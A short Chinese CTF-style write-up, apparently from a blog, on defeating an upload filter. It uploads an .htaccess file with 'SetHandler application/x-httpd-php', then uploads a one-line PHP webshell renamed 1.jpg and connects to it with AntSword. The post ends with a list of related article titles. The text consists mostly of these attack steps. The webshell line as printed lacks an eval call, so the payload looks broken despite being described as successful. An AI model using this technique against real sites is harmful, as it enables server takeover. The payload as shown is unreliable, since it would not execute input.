最简单的一个文件上传,理论上只支持文件内容极少的jpeg和jpg,是的,你没有听错,内容极少
所以不要尝试去尝试上传一个jpg图片检测文件后缀,因为网上download下来的图片绝大多数内容超过限制
ok,那么经过检测,.htaccess没有被过滤
那么上传一个.htaccess文件,内容为
SetHandler application/x-httpd-php
表示凡是.htaccess文件夹所在目录的文件都由php进行处理
然后上传一句话,<script language=php>$_POST['hello']</script>
,文件名改为1.jpg
上传成功,蚁剑链接,end
参考视频链接:https://www.bilibili.com/video/BV1Y44y1i74c/
相关文章
- 11-05C++ Web Service SDK
- 11-05golang 微服务以及相关web框架
- 11-05web安全入门 4 (文件上传漏洞与webshell)
- 11-05CTF-攻防世界-Web-新10-webshell
- 11-05[理论-学习]Web安全-文件上传-基础05
- 11-05nginx-我真的需要Web服务器以及API-微服务架构中的网关
- 11-05基于WAF入侵检测和变异WebShell检测算法的Web安全研究
- 11-05第4阶段 实战web渗透测试视频课程(第一部分) 8、某安全群友发出某站-利用在线编辑器ewebeditor拿webshell全过程
- 11-05攻防世界 web webshell
- 11-05Web Uploader图片压缩解决办法方案